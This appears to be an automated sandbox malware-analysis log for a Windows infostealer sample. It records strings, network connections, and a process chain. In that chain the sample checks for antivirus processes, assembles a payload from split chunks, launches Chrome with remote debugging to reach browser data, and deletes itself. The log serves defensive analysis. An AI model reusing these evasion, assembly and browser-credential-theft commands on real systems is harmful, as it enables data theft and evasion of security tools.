    Source: Rip.com.1.dr, Cartoons.8.drString found in binary or memory: https://www.autoitscript.com/autoit3/
    Source: 8yu37g.12.drString found in binary or memory: https://www.ecosia.org/newtab/
    Source: 9z5fu3.12.drString found in binary or memory: https://www.expedia.com/?locale=en_US&siteid=1&semcid=US.UB.ADMARKETPLACE.GT-C-EN.HOTEL&SEMDTL=a1219
    Source: Cartoons.8.drString found in binary or memory: https://www.globalsign.com/repository/0
    Source: chrome.exe, 00000011.00000003.2008108429.0000211000294000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google-analytics.com
    Source: chrome.exe, 00000011.00000003.2008108429.0000211000294000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google-analytics.com;report-uri
    Source: chrome.exe, 00000011.00000003.2008108429.0000211000294000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com
    Source: chrome.exe, 00000011.00000003.1997007279.0000211000D4C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/
    Source: chrome.exe, 00000011.00000003.2024388713.0000211001498000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/chrome/go-mobile/?ios-campaign=desktop-chr-ntp&android-campaign=desktop-chr-n
    Source: chrome.exe, 00000011.00000003.2024388713.0000211001498000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/chrome/hats/index.htmlb
    Source: 8yu37g.12.drString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
    Source: chrome.exe, 00000011.00000003.2024160852.0000211001460000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2022513743.00002110012A4000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2022221372.0000211001378000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2023959664.0000211001394000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2023925727.0000211001378000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/imghp?hl=en&amp;tab=ri&amp;ogbl
    Source: chrome.exe, 00000011.00000003.2023925727.0000211001378000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2023814051.00002110013DC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/intl/en/about/products?tab=rh
    Source: chrome.exe, 00000011.00000003.2024388713.0000211001498000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/search
    Source: chrome.exe, 00000011.00000003.2005088848.000021100042C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/search?q=$
    Source: chrome.exe, 00000011.00000003.2008108429.0000211000294000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.comAccess-Control-Allow-Credentials:
    Source: chrome.exe, 00000011.00000003.2024388713.0000211001498000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/auth/aida2
    Source: chromecache_95.19.drString found in binary or memory: https://www.googleapis.com/auth/plus.me
    Source: chromecache_95.19.drString found in binary or memory: https://www.googleapis.com/auth/plus.people.recommended
    Source: chrome.exe, 00000011.00000003.2027885213.0000211001724000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2027909825.000021100172C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2027768324.000021100170C000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2027935254.0000211001730000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2027622357.00002110016F8000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2027819147.0000211001720000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/auth/shieldedids.manager
    Source: chrome.exe, 00000011.00000003.2024388713.0000211001498000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/auth/shieldedids.manager2
    Source: chrome.exe, 00000011.00000003.2024388713.0000211001498000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.googleapis.com/auth/shieldedids.manager23
    Source: chrome.exe, 00000011.00000003.2008108429.0000211000294000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.googletagmanager.com
    Source: chrome.exe, 00000011.00000003.2008108429.0000211000294000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com
    Source: chromecache_98.19.drString found in binary or memory: https://www.gstatic.com/gb/html/afbp.html
    Source: chromecache_98.19.drString found in binary or memory: https://www.gstatic.com/images/icons/material/anim/mspin/mspin_googcolor_medium.css
    Source: chromecache_98.19.drString found in binary or memory: https://www.gstatic.com/images/icons/material/anim/mspin/mspin_googcolor_small.css
    Source: chrome.exe, 00000011.00000003.2023925727.0000211001378000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com/images/icons/material/system/1x/broken_image_grey600_18dp.png
    Source: chrome.exe, 00000011.00000003.2024160852.0000211001460000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2023858372.00002110013BC000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2022597317.0000211001450000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2022221372.0000211001378000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2023959664.0000211001394000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2023925727.0000211001378000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com/images/icons/material/system/2x/broken_image_grey600_18dp.png
    Source: chrome.exe, 00000011.00000003.2023925727.0000211001378000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2023814051.00002110013DC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com/og/_/js/k=og.qtm.en_US.otmEBJ358uU.2019.O/rt=j/m=q_dnp
    Source: chrome.exe, 00000011.00000003.2023925727.0000211001378000.00000004.00000800.00020000.00000000.sdmp, chrome.exe, 00000011.00000003.2023814051.00002110013DC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com/og/_/ss/k=og.qtm.zyyRgCCaN80.L.W.O/m=qmd
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49744
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49788
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49743
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
    Source: unknownNetwork traffic detected: HTTP traffic on port 49779 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49781
    Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49781 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49769 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49776 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49799 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49738
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49737
    Source: unknownNetwork traffic detected: HTTP traffic on port 49753 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49779
    Source: unknownNetwork traffic detected: HTTP traffic on port 49772 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49778
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49777
    Source: unknownNetwork traffic detected: HTTP traffic on port 49675 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49776
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49775
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49774
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49773
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49772
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49771
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49770
    Source: unknownNetwork traffic detected: HTTP traffic on port 49788 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49767 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49777 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49773 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49769
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49768
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49767
    Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49764
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49760
    Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49760 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49764 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49770 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49751 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49778 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49774 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49799
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49753
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49752
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49751
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49750
    Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49768 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49775 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49771 -> 443
    Source: unknownHTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.4:49737 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 116.203.13.109:443 -> 192.168.2.4:49738 version: TLS 1.2
    Source: C:\Users\user\Desktop\CenteredDealing.exeCode function: 0_2_004050CD GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_004050CD
    Source: C:\Users\user\Desktop\CenteredDealing.exeCode function: 0_2_004044A5 GetDlgItem,GetDlgItem,IsDlgButtonChecked,GetDlgItem,GetAsyncKeyState,GetDlgItem,ShowWindow,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,0_2_004044A5
    Source: C:\Users\user\Desktop\CenteredDealing.exeCode function: 0_2_00403883 EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcmpiW,CreateDirectoryW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,InitOnceBeginInitialize,ExitWindowsEx,0_2_00403883
    Source: C:\Users\user\Desktop\CenteredDealing.exeFile created: C:\Windows\CruisesReggaeJump to behavior
    Source: C:\Users\user\Desktop\CenteredDealing.exeFile created: C:\Windows\JjFeatureJump to behavior
    Source: C:\Users\user\Desktop\CenteredDealing.exeFile created: C:\Windows\BlastEnteredJump to behavior
    Source: C:\Users\user\Desktop\CenteredDealing.exeFile created: C:\Windows\MontrealTeethJump to behavior
    Source: C:\Users\user\Desktop\CenteredDealing.exeFile created: C:\Windows\FtReleasesJump to behavior
    Source: C:\Users\user\Desktop\CenteredDealing.exeFile created: C:\Windows\DildoWitnessesJump to behavior
    Source: C:\Users\user\Desktop\CenteredDealing.exeFile created: C:\Windows\GospelNeighborsJump to behavior
    Source: C:\Users\user\Desktop\CenteredDealing.exeFile created: C:\Windows\ControlledCruiseJump to behavior
    Source: C:\Users\user\Desktop\CenteredDealing.exeFile created: C:\Windows\WellDepartmentJump to behavior
    Source: C:\Users\user\Desktop\CenteredDealing.exeCode function: 0_2_0040497C0_2_0040497C
    Source: C:\Users\user\Desktop\CenteredDealing.exeCode function: 0_2_00406ED20_2_00406ED2
    Source: C:\Users\user\Desktop\CenteredDealing.exeCode function: 0_2_004074BB0_2_004074BB
    Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\208639\Rip.com 1300262A9D6BB6FCBEFC0D299CCE194435790E70B9C7B4A651E202E90A32FD49
    Source: C:\Users\user\Desktop\CenteredDealing.exeCode function: String function: 004062A3 appears 58 times
    Source: CenteredDealing.exeStatic PE information: invalid certificate
    Source: CenteredDealing.exe, 00000000.00000002.1777631815.0000000000810000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameCmd.Exej% vs CenteredDealing.exe
    Source: CenteredDealing.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
    Source: classification engineClassification label: mal92.troj.spyw.evad.winEXE@47/48@9/8
    Source: C:\Users\user\Desktop\CenteredDealing.exeCode function: 0_2_004044A5 GetDlgItem,GetDlgItem,IsDlgButtonChecked,GetDlgItem,GetAsyncKeyState,GetDlgItem,ShowWindow,SetWindowTextW,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,0_2_004044A5
    Source: C:\Users\user\Desktop\CenteredDealing.exeCode function: 0_2_004024FB CoCreateInstance,0_2_004024FB
    Source: C:\Users\user\Desktop\CenteredDealing.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\InteractiveJump to behavior
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6956:120:WilError_03
    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7480:120:WilError_03
    Source: C:\Users\user\Desktop\CenteredDealing.exeFile created: C:\Users\user\AppData\Local\Temp\nsb8C25.tmpJump to behavior
    Source: CenteredDealing.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
    Source: C:\Windows\SysWOW64\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
    Source: C:\Windows\SysWOW64\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
    Source: C:\Users\user\Desktop\CenteredDealing.exeFile read: C:\Users\desktop.iniJump to behavior
    Source: C:\Users\user\Desktop\CenteredDealing.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
    Source: nozukfct0.12.drBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
    Source: C:\Users\user\Desktop\CenteredDealing.exeFile read: C:\Users\user\Desktop\CenteredDealing.exeJump to behavior
    Source: unknownProcess created: C:\Users\user\Desktop\CenteredDealing.exe "C:\Users\user\Desktop\CenteredDealing.exe"
    Source: C:\Users\user\Desktop\CenteredDealing.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c move Startup Startup.cmd & Startup.cmd
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "opssvc wrsa"
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c md 208639
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\extrac32.exe extrac32 /Y /E Dodge
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /V "Borough" Architecture
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b 208639\Rip.com + Preparing + Functional + Sends + Petroleum + Root + Exhibitions + Sexuality + State + Bridal + Cartoons 208639\Rip.com
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Vienna + ..\Winston + ..\Assumptions + ..\Interactive + ..\Keith + ..\Anaheim + ..\Kuwait + ..\Jackson d
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\208639\Rip.com Rip.com d
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\208639\Rip.comProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2332 --field-trial-handle=2248,i,8807016753924455708,494945956636832541,262144 /prefetch:8
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\208639\Rip.comProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c timeout /t 10 & del /f /q "C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\208639\Rip.com" & rd /s /q "C:\ProgramData\8ycbs" & exit
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 10
    Source: C:\Users\user\Desktop\CenteredDealing.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c move Startup Startup.cmd & Startup.cmdJump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklistJump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "opssvc wrsa" Jump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklistJump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth" Jump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c md 208639Jump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\extrac32.exe extrac32 /Y /E DodgeJump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /V "Borough" Architecture Jump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b 208639\Rip.com + Preparing + Functional + Sends + Petroleum + Root + Exhibitions + Sexuality + State + Bridal + Cartoons 208639\Rip.comJump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b ..\Vienna + ..\Winston + ..\Assumptions + ..\Interactive + ..\Keith + ..\Anaheim + ..\Kuwait + ..\Jackson dJump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\208639\Rip.com Rip.com dJump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\choice.exe choice /d y /t 5Jump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\208639\Rip.comProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"Jump to behavior
    Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\208639\Rip.comProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c timeout /t 10 & del /f /q "C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\208639\Rip.com" & rd /s /q "C:\ProgramData\8ycbs" & exitJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2332 --field-trial-handle=2248,i,8807016753924455708,494945956636832541,262144 /prefetch:8Jump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 10Jump to behavior
    Source: C:\Users\user\Desktop\CenteredDealing.exeSection loaded: apphelp.dllJump to behavior
    Source: C:\Users\user\Desktop\CenteredDealing.exeSection loaded: version.dllJump to behavior
    Source: C:\Users\user\Desktop\CenteredDealing.exeSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Users\user\Desktop\CenteredDealing.exeSection loaded: uxtheme.dllJump to behavior
    Source: C:\Users\user\Desktop\CenteredDealing.exeSection loaded: shfolder.dllJump to behavior
    Source: C:\Users\user\Desktop\CenteredDealing.exeSection loaded: windows.storage.dllJump to behavior
    Source: C:\Users\user\Desktop\CenteredDealing.exeSection loaded: wldp.dllJump to behavior
    Source: C:\Users\user\Desktop\CenteredDealing.exeSection loaded: propsys.dllJump to behavior
    Source: C:\Users\user\Desktop\CenteredDealing.exeSection loaded: riched20.dllJump to behavior
    Source: C:\Users\user\Desktop\CenteredDealing.exeSection loaded: usp10.dllJump to behavior
    Source: C:\Users\user\Desktop\CenteredDealing.exeSection loaded: msls31.dllJump to behavior
    Source: C:\Users\user\Desktop\CenteredDealing.exeSection loaded: textinputframework.dllJump to behavior
    Source: C:\Users\user\Desktop\CenteredDealing.exeSection loaded: coreuicomponents.dllJump to behavior
    Source: C:\Users\user\Desktop\CenteredDealing.exeSection loaded: coremessaging.dllJump to behavior
    Source: C:\Users\user\Desktop\CenteredDealing.exeSection loaded: ntmarta.dllJump to behavior
    Source: C:\Users\user\Desktop\CenteredDealing.exeSection loaded: wintypes.dllJump to behavior
    Source: C:\Users\user\Desktop\CenteredDealing.exeSection loaded: wintypes.dllJump to behavior
    Source: C:\Users\user\Desktop\CenteredDealing.exeSection loaded: wintypes.dllJump to behavior
    Source: C:\Users\user\Desktop\CenteredDealing.exeSection loaded: textshaping.dllJump to behavior
    Source: C:\Users\user\Desktop\CenteredDealing.exeSection loaded: profapi.dllJump to behavior
    Source: C:\Users\user\Desktop\CenteredDealing.exeSection loaded: edputil.dllJump to behavior
    Source: C:\Users\user\Desktop\CenteredDealing.exeSection loaded: urlmon.dllJump to behavior
    Source: C:\Users\user\Desktop\CenteredDealing.exeSection loaded: iertutil.dllJump to behavior
    Source: C:\Users\user\Desktop\CenteredDealing.exeSection loaded: srvcli.dllJump to behavior
    Source: C:\Users\user\Desktop\CenteredDealing.exeSection loaded: netutils.dllJump to behavior
    Source: C:\Users\user\Desktop\CenteredDealing.exeSection loaded: windows.staterepositoryps.dllJump to behavior
    Source: C:\Users\user\Desktop\CenteredDealing.exeSection loaded: sspicli.dllJump to behavior
    Source: C:\Users\user\Desktop\CenteredDealing.exeSection loaded: appresolver.dllJump to behavior
    Source: C:\Users\user\Desktop\CenteredDealing.exeSection loaded: bcp47langs.dllJump to behavior
    Source: C:\Users\user\Desktop\CenteredDealing.exeSection loaded: slc.dllJump to behavior
    Source: C:\Users\user\Desktop\CenteredDealing.exeSection loaded: userenv.dllJump to behavior
    Source: C:\Users\user\Desktop\CenteredDealing.exeSection loaded: sppc.dllJump to behavior
    Source: C:\Users\user\Desktop\CenteredDealing.exeSection loaded: onecorecommonproxystub.dllJump to behavior
    Source: C:\Users\user\Desktop\CenteredDealing.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cmdext.dllJump to behavior
    Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dllJump to behavior
    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: version.dllJump to behavior
    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: mpr.dllJump to behavior
    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: framedynos.dllJump to behavior
    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: dbghelp.dllJump to behavior
    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dllJump to behavior
    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: srvcli.dllJump to behavior
    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: netutils.dllJump to behavior
    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dllJump to behavior
    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: wbemcomn.dllJump to behavior
    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: winsta.dllJump to behavior
    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: amsi.dllJump to behavior
    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: userenv.dllJump to behavior
    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: profapi.dllJump to behavior
    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: version.dllJump to behavior
    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: mpr.dllJump to behavior
    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: framedynos.dllJump to behavior
    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: dbghelp.dllJump to behavior
    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dllJump to behavior
    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: srvcli.dllJump to behavior
    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: netutils.dllJump to behavior
    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dllJump to behavior
    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: wbemcomn.dllJump to behavior
